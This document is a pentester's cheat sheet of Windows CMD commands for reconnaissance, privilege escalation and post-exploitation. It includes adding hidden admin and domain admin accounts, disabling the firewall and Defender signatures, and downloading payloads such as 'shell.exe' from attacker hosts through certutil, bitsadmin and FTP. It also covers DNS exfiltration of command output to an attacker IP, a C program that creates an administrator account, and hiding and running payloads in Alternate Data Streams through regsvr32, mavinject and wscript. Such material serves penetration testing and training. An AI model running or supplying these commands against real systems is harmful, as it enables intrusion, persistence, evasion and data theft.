Basic CMD for Pentesters

System info

Version and Patches info

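# NOTE: '#' does not start a comment in cmd.exe - the notes after it are for the reader, drop them before pasting
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture (wmic.exe is deprecated and missing on recent Windows 11 builds, hence the echo fallback)
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" | findstr /C:"ProductName" /C:"CurrentBuild" /C:"UBR" #Exact build + UBR (patch level) without wmic
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches (needs wmic)
systeminfo | findstr /C:"KB" #Patches without wmic (systeminfo lists the installed hotfixes)
hostname
DRIVERQUERY /v #3rd party driver vulnerable? (/v adds the driver path; compare names/versions against known-vulnerable (BYOVD) driver lists)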

Environment

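set #List all environment variables (inherited from the parent process - look for credentials, tokens or API keys left in them)
set PATH #Only variables starting with PATH; a writable directory early in PATH is a privilege-escalation vector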
Some env variables to highlight:
    COMPUTERNAME: Name of the computer
    TEMP/TMP: Temp folder
    USERNAME: Your username
    HOMEPATH/USERPROFILE: Home directory
    windir: C:\Windows
    OS: OS family (always Windows_NT on modern Windows; it does not tell you the version)
    LOGONSERVER: Domain controller that authenticated this logon, in \\DCNAME form
    USERDNSDOMAIN: Domain name to use with DNS
    USERDOMAIN: Name of the domain
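nslookup %LOGONSERVER:\\=%.%USERDNSDOMAIN% #DNS request for the DC (LOGONSERVER is \\DCNAME; the :\\= substitution strips the leading backslashes so the query is a valid FQDN)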

Mounted disks

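(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul) #Drive letters; fsutil is the fallback where wmic is deprecated/absent
wmic logicaldisk get caption,description,providername #providername shows the UNC path behind mapped network drives
net use #Mapped drives and their UNC paths without wmic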

AV

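WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List #Registered AV products (client OS only: the SecurityCenter2 namespace does not exist on Windows Server)
sc query windefend #Defender engine service state
sc query sense #Defender for Endpoint (EDR) sensor service, if present
reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions" /s #Configured exclusion paths/processes (often readable by low-priv users on older builds)
#Delete all Defender signatures (useful for machines without internet access)
#WARNING: requires admin, is destructive and is recorded in the Defender operational event log - prefer abusing an exclusion from the query above
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All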

Recycle Bin

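dir /a /s /b C:\$Recycle.Bin #Deleted files, one sub-folder per user SID; /a is required because the SID folders are hidden/system and are skipped by a plain dir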

Processes, Services & Software

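schtasks /query /fo LIST /v #Verbose out of scheduled tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v | findstr /C:"TaskName" /C:"Task To Run" /C:"Run As User" #Task, command and account in one view (look for SYSTEM tasks running binaries/scripts you can write to)
tasklist /V #List processes with user context
tasklist /SVC #links processes to started services
net start #Windows Services started
wmic service list brief #List services (wmic is deprecated; use sc query below where it is missing)
sc query #Running services only
sc query type= service state= all #All services including stopped ones (the space after '=' is mandatory)
dir /a "C:\Program Files" #Installed software
dir /a "C:\Program Files (x86)" #Installed software
reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software (vendor keys)
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr DisplayName #Installed software (64-bit entries)
reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr DisplayName #Installed software (32-bit entries)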

Domain info

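echo %USERDOMAIN% #Get domain name (NetBIOS form)
echo %USERDNSDOMAIN% #Get domain name (DNS form)
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller (set does a prefix match)
net groups /domain #List of domain groups
net group "domain computers" /domain #List of computer accounts joined to the domain
net view /domain #List of PCs of the domain (depends on the Browser service, so it is often empty on modern networks)
nltest /dclist:<DOMAIN> #List domain controllers
nltest /dsgetdc:<DOMAIN> #Locate a DC and show its site and flags
net group "Domain Controllers" /domain #List computer accounts of the domain controllers
net group "Domain Admins" /domain #List users with domain admin privileges
net localgroup administrators /domain #List members of the domain's built-in Administrators group (the group "Domain Admins" is nested in it)
net user /domain #List all users of the domain
net user <ACCOUNT_NAME> /domain #Get information about that user
net accounts /domain #Password and lockout policy (check the lockout threshold BEFORE any password spraying)
nltest /domain_trusts #Mapping of the trust relationships (the switch is plural: /domain_trusts)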

Logs & Events

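#Query the Security log of a remote host using other credentials
#The password is part of the command line, so process-creation auditing (event 4688 with command-line logging) captures it; use /p:* to be prompted instead
wevtutil qe security /rd:true /f:text /r:<REMOTE_HOST> /u:<DOMAIN>\<USER> /p:<PASSWORD>
wevtutil qe security /rd:true /f:text /c:20 /q:"*[System[(EventID=4624)]]" #Last 20 successful logons on this host (reading the Security log needs admin or Event Log Readers membership)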

Users & Groups

Users

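whoami /all #All info about me: groups, SIDs and privileges (the Mandatory Label line tells you whether the token is UAC-filtered)
whoami /priv #Show only privileges (SeImpersonate, SeAssignPrimaryToken, SeBackup, SeRestore, SeDebug... are privesc candidates)
net users #All users
dir /b /ad "C:\Users" #Profile folders also reveal accounts that logged on interactively
net user %username% #Info about a user (me)
net accounts #Information about password requirements
qwinsta #Anyone else logged in?
cmdkey /list #List saved credentials (usable with runas /savecred)
net user <username> <password> /add #Create user (username first, then password; needs admin and generates event 4720)

#Launch new cmd.exe with new creds (to impersonate in network)
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" #The password will be prompted; with /netonly the creds are only used for outbound network auth, so whoami still shows the original user

#Check current logon sessions as administrator using logonsessions from sysinternals
logonsessions.exe
logonsessions64.exe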

Groups

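#Local
net localgroup #All available groups
net localgroup Administrators #Info about a group (admins)
net localgroup administrators <username> /add #Add user to administrators (needs admin; logged as event 4732)

#Domain
net group /domain #Info about domain groups
net group "<domain_group_name>" /domain #Users that belong to the group (the group name goes before /domain)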

List sessions

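qwinsta #Interactive sessions (console/RDP) on this host
query user #Same information, user-oriented view
klist sessions #Logon sessions known to the Kerberos client; the LUID can be passed to klist -li <LUID> to list that session's tickets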

Password Policy

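net accounts #Local password and lockout policy; a lockout threshold of "Never" means spraying cannot lock accounts
net accounts /domain #Same for the domain policy (fine-grained password policies applied to specific groups are NOT shown here)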

Persistence with users

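# Add domain user and put them in the Domain Admins group (needs Domain Admin rights; generates events 4720 and 4728 on the DC)
net user <username> <password> /ADD /DOMAIN
net group "Domain Admins" <username> /ADD /DOMAIN

# Add local user and put them in the local Administrators group (needs local admin; events 4720 and 4732)
net user <username> <password> /ADD
net localgroup Administrators <username> /ADD

# Add user to interesting groups:
net localgroup "Remote Desktop Users" <username> /add
net localgroup "Debugger users" <username> /add
net localgroup "Power users" <username> /add

# The password must satisfy the policy shown by 'net accounts' or the command fails; it is also captured by command-line auditing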

Network

Interfaces, Routes, Ports, Hosts and DNSCache

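ipconfig /all #Info about interfaces (DNS servers, DHCP server, DNS suffix = domain hints)
route print #Print available routes (other subnets reachable from this host)
arp -a #Known hosts (recently contacted on the local segment)
netstat -ano #Open ports with owning PID (match against tasklist); services bound only to 127.0.0.1 are port-forwarding candidates
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host" #Cached DNS names = hosts this machine resolved recently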

Firewall

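netsh firewall show state # FW info, open ports (the 'netsh firewall' context is deprecated and may be absent; 'netsh advfirewall' is the current one)
netsh advfirewall firewall show rule name=all
netsh firewall show config # FW info
netsh advfirewall show allprofiles #State of each profile (domain/private/public)

netsh advfirewall set allprofiles state off #Turn Off (admin; very visible - a single allow rule is quieter)
netsh advfirewall set allprofiles state on #Turn On
netsh firewall set opmode disable #Turn Off (legacy syntax)

::How to open ports
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"
netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=TCP localport=3389 #advfirewall equivalent of the legacy line above

::Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes #Enables the built-in RDP rule group (advfirewall form)
::netsh firewall set service remotedesktop enable #I found that this line is not needed
::sc config TermService start= auto #I found that this line is not needed
::net start Termservice #I found that this line is not needed
::Before trying pass-the-hash over RDP check NLA and Restricted Admin mode (the /pth connection below needs Restricted Admin enabled on the target):
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin

::Enable Remote assistance (straight quotes - the curly quotes in the original break the path containing a space):
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable

::Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
::Every step is logged (4720/4732 account events, registry and firewall changes) - only use it when stealth does not matter
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable

::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49 #/pth only succeeds when Restricted Admin mode is enabled on the target (DisableRestrictedAdmin = 0; absent or 1 means off on modern builds)
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49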

Shares

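net view #Get a list of computers (Browser-service dependent; may come back empty)
net view /all /domain [domainname] #Shares on the domain
net view \\computer /ALL #List shares of a computer (/ALL includes the administrative shares C$, ADMIN$, IPC$)
net use x: \\computer\share #Mount the share locally (append /user:<DOMAIN>\<USER> to authenticate as someone else)
net use x: /delete #Unmap it when done
net share #Check the shares exported by this host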

Wifi

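netsh wlan show profile #SSIDs of the Wi-Fi networks saved on this host
netsh wlan show profile <SSID> key=clear #Get cleartext PSK under "Key Content" (showing the key requires an elevated prompt)
netsh wlan show profile <SSID> key=clear | findstr /C:"SSID name" /C:"Key Content" #Just the name/key pair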

SNMP

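reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s #Community strings (ValidCommunities) and PermittedManagers; a read-write community is a remote configuration path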

Network Interfaces

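ipconfig /all #Interfaces, MAC/IP addresses, DNS servers and DNS suffix (same command as in the Network section above, kept for quick reference)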

ARP table

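arp -a #Documented switch is lower-case -a; shows the IP/MAC cache = hosts this machine talked to recently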

Download

Bitsadmin.exe
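#The original listing had the four commands on one line; they are separate invocations
bitsadmin /create 1
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
bitsadmin /RESUME 1
bitsadmin /complete 1
#One-shot equivalent (bitsadmin is deprecated but still shipped; BITS jobs survive reboots and are listed by 'bitsadmin /list /allusers')
bitsadmin /transfer 1 /download /priority foreground https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe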
CertReq.exe
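CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt #POSTs win.ini to the URL and saves the HTTP response body to output.txt - exfiltration and download in one call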
Certutil.exe
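certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe #Heavily signatured by AV/EDR; -split writes the file, and a cached copy stays in the user's INetCache until removed with: certutil -urlcache <URL> delete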
Desktopimgdownldr.exe
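set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr #The file lands under %SYSTEMROOT%\Personalization\LockScreenImage\ - overriding SYSTEMROOT points that at a writable folder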
Diantz.exe
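diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab #Fetches the remote file (SMB or WebDAV UNC) and wraps it in a CAB; extract with expand/extrac32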
Esentutl.exe
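esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o #/y source, /d destination; both may be WebDAV UNC paths, so it can also copy between two remote hosts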
Expand.exe
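expand \\webdav\folder\file.bat c:\ADS\file.bat #Copies a non-compressed file from a WebDAV share (expand also accepts an ADS path as destination, see the ADS section)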
Extrac32.exe
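extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt #/C copies a single file from a UNC (WebDAV) source; /Y suppresses the overwrite prompt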
Findstr.exe
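findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe #/V prints every line NOT containing the literal; any string absent from the file works, so this copies the whole file from the WebDAV share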
Ftp.exe
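#Credentials end up in cleartext in ftp.txt on disk and on the wire (FTP is unencrypted); delete the script afterwards
cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v&del ftp.txt"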
GfxDownloadWrapper.exe
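C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE" #Intel graphics driver helper, only present on hosts with that driver; the [0-9]+ part is a per-machine hash - find it with: dir /s /b C:\Windows\System32\DriverStore\FileRepository\GfxDownloadWrapper.exe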
Hh.exe
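HH.exe http://some.url/script.ps1 #Opens the URL in HTML Help; the fetched file is left in the user's INetCache, from where it can be picked up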
Ieexec.exe
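ieexec.exe http://x.x.x.x:8080/bypass.exe #Downloads AND executes a .NET assembly; ships with .NET Framework 2.0/3.5 only, so it is absent on hosts without that runtime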
Makecab.exe
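makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab #Same as diantz: fetches the remote file into a CAB; extract with expand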
MpCmdRun.exe
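MpCmdRun.exe -DownloadFile -url <URL> -path <path> #Windows Defender executable ('//' is not a comment in cmd); Microsoft removed -DownloadFile in later Defender updates, so expect it to fail on patched hosts, and the download is scanned by Defender itself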
Replace.exe
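replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A #/A adds files that do not yet exist in the destination folder (without /A it only overwrites existing ones)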
Excel.exe
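Excel.exe http://192.168.1.10/TeamsAddinLoader.dll #Requires Office; the URL is fetched into the user's INetCache (the GUI opens and the user may see a prompt)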
Powerpnt.exe
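Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll" #Requires Office; the URL is fetched into the user's INetCache (GUI opens, not silent)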
Squirrel.exe
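squirrel.exe --download [url to package] #Squirrel installer bundled with Electron apps (Teams, Discord...); expects a release feed (a URL serving a RELEASES file plus .nupkg), not an arbitrary file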
Update.exe
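Update.exe --download [url to package] #Same Squirrel binary under its per-app name (e.g. %LOCALAPPDATA%\Microsoft\Teams\Update.exe); same feed-format requirement as squirrel.exe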
Winword.exe
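winword.exe "http://192.168.1.10/TeamsAddinLoader.dll" #Requires Office; the URL is fetched into the user's INetCache (GUI opens, not silent)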
Wsl.exe
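wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary' #Needs an installed WSL distribution; /dev/tcp is a bash feature, and the file is written inside the distro's filesystem (reachable from Windows via \\wsl$\)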

Misc

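cd #Get current dir
cd C:\path\to\dir #Change dir (add /d to change the drive letter as well)
dir #List current dir
dir /a:h C:\path\to\dir #List hidden files
dir /s /b #Recursive list, bare paths only
time /t #Get current time (/t avoids the "enter the new time" prompt)
date /t #Get current date (/t likewise)
shutdown /r /t 0 #Reboot now (/s instead of /r powers the host off; both are extremely visible)
type <file> #Cat file

#Runas
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials (works only if 'cmdkey /list' shows an entry for that user)
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" #The password will be prompted; the creds are used for network auth only

#Hide
attrib +h file #Set Hidden
attrib -h file #Unset Hidden ('dir /a' still shows hidden files, so this is not real concealment)

#Give full control over a file that you own (icacls syntax - /e and /p belong to the legacy cacls tool and are rejected by icacls)
icacls <FILE_PATH> /grant <USERNAME>:F /t
icacls <FILE_PATH> /remove <USERNAME> /t #Remove the permission
icacls <FILE_PATH> #Show the current ACL; (F)/(M)/(W) for Users or Everyone on a binary that runs as SYSTEM is a privesc

#Recursive copy to smb (switches spelled out: /H hidden+system, /I assume destination is a dir, /E empty subdirs, /V verify, /R overwrite read-only, /Y no prompt)
xcopy /H /I /E /V /R /Y C:\Users\security\.yawcam \\10.10.14.13\name\win

#exe2bat to transform exe file in bat file

#ADS
dir /r #Detect ADS
more < file.txt:ads.txt #read ADS (redirect form, same as in the ADS section below)
powershell (Get-Content file.txt -Stream ads.txt)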

Listen address ACLs

You can bind an HTTP listener on http://+:80/Temporary_Listen_Addresses/ without being an administrator, because that URL reservation is granted to non-admin users by default; the command below shows every reservation and who it is granted to, so look for other broadly granted entries as well.
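netsh http show urlacl #URL reservations and the SIDs/users allowed to bind them; entries granted to Everyone or Users let an unprivileged process serve HTTP on that prefix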

Manual DNS shell

Attacker (Kali) must use one of these 2 options:
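sudo responder -I <iface> #Active: answers the queries, so the victim's nslookup returns instead of timing out (also logs the names it receives)
sudo tcpdump -i <iface> -A 'udp and dst port 53 and dst host <KALI_IP>' #Passive: 'proto udp' and 'dst ip' are not valid BPF keywords - use udp / dst host and quote the filter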

Victim

`for /f "tokens=..."` technique: this lets us run a command on the victim, take the first N words of each output line and send them as DNS labels to our server.
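for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> #Get word2
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #List folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List that folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as last one
#More complex commands
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Enabled privileges, one DNS query per output line
#Notes: inside a .bat file write %%a instead of %a; a pipe inside the ('...') must be escaped as ^|
#Each token becomes a DNS label: labels longer than 63 chars, names longer than 253 chars, or characters outside letters/digits/'-' (e.g. the '\' in domain\user) may break the lookup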
You can also redirect the output, and then read it.
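whoami /priv | findstr "Enab" > C:\Users\Public\Documents\out.txt #Public\Documents is writable by any user (typo 'finstr' fixed)
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
del C:\Users\Public\Documents\out.txt #Remove the staging file afterwards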

Calling CMD from C code

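#include <stdlib.h> /* system, NULL, EXIT_FAILURE */

// When executed by an elevated Administrator this program creates a user and then adds it to the administrators group.
// Build: i686-w64-mingw32-gcc addmin.c -o addmin.exe
// Optional: upx -9 addmin.exe   (note: UPX packing makes the binary MORE suspicious to AV, not less)
// Both 'net' calls spawn a visible child process and generate events 4720 and 4732.

int main(void) {
    // system() returns the command's exit status; 'net' returns non-zero when the
    // account already exists, the password violates the policy, or the caller is not elevated.
    // Stop at the first failure instead of blindly running the second command.
    if (system("net users otherAcc 0TherAcc! /add") != 0) {
        return EXIT_FAILURE;
    }
    if (system("net localgroup administrators otherAcc /add") != 0) {
        return EXIT_FAILURE;
    }
    return 0;
}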

Alternate Data Streams CheatSheet (ADS/Alternate Data Stream)

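###Add content to ADS###
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
#The line above is a text-mode copy and can corrupt binaries; for executables read/write bytes (-Encoding Byte on PowerShell 5, -AsByteStream on 7)
curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct ^scrobj.dll > fakefile.doc:reg32.bat
Set-Content -Path <path to the file> -Stream <name of the stream> -Value <data> #PowerShell; the original had stray spaces after the dashes, which breaks parameter parsing

### Discover ADS content
dir /R
streams.exe <c:\path\to\file> #Binary from sysinternals#
Get-Item -Path .\file.txt -Stream *
gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'

###Extract content from ADS###
expand c:\ads\file.txt:test.exe c:\temp\evil.exe
esentutl.exe /Y C:\temp\file.txt:test.exe /d c:\temp\evil.exe /o
more < c:\ads\file.txt:test.exe

###Executing the ADS content###
#The stream hides the payload from a casual dir, not from EDR: the process tree (wmic/rundll32/wscript -> "file.txt:stream") and the stream path in the command line are what gets detected

* WMIC
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'

* Rundll32
rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain
rundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dll
rundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll

* Cscript
cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"

* Wscript
wscript c:\ads\file.txt:script.vbs
echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js

* Forfiles
forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"

* Mavinject.exe
c:\windows\SysWOW64\notepad.exe
tasklist | findstr notepad
#sample output: notepad.exe 4172 31C5CE94259D4006 2 18,476 K   (4172 is the PID used below)
type c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
#The WinSxS folder name is build-specific (10.0.16299 = Windows 10 1709); locate the right one with: dir /s /b c:\windows\WinSxS\mavinject.exe

* MSHTA
mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"
(Does not work on Windows 10 1903 and newer)

* Control.exe
control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll
https://twitter.com/bohops/status/954466315913310209

* Create service and run (needs admin; the installation is logged as System event 7045)
sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
sc start evilservice
sc delete evilservice #Clean up afterwards
https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/

* Powershell.exe
powershell -ep bypass - < c:\temp:ttt #'-' makes powershell read the script from stdin

* Powershell.exe
powershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}"

* Powershell.exe
Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = 'C:\ads\folder:file.exe'} #CommandLine must be a quoted string; the unquoted path in the original is a syntax error

* Regedit.exe
regedit c:\ads\file.txt:regfile.reg

* Bitsadmin.exe
bitsadmin /create myfile
bitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exe
bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL
bitsadmin /RESUME myfile

* AppVLP.exe
AppVLP.exe c:\windows\tracing\test.txt:ha.exe

* Cmd.exe
cmd.exe - < fakefile.doc:reg32.bat
https://twitter.com/yeyint_mth/status/1143824979139579904

* Ftp.exe
ftp -s:fakefile.txt:aaaa.txt
https://github.com/sailay1996/misc-bin/blob/master/ads.md

* ieframe.dll , shdocvw.dll (ads)
echo [internetshortcut] > fake.txt:test.txt && echo url=C:\windows\system32\calc.exe >> fake.txt:test.txt && rundll32.exe ieframe.dll,OpenURL C:\temp\ads\fake.txt:test.txt
rundll32.exe shdocvw.dll,OpenURL C:\temp\ads\fake.txt:test.txt
https://github.com/sailay1996/misc-bin/blob/master/ads.md

* bash.exe
echo calc > fakefile.txt:payload.sh && bash < fakefile.txt:payload.sh
bash.exe -c $(fakefile.txt:payload.sh)
https://github.com/sailay1996/misc-bin/blob/master/ads.md

* Regsvr32
type c:\Windows\System32\scrobj.dll > Textfile.txt:LoveADS
regsvr32 /s /u /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Textfile.txt:LoveADS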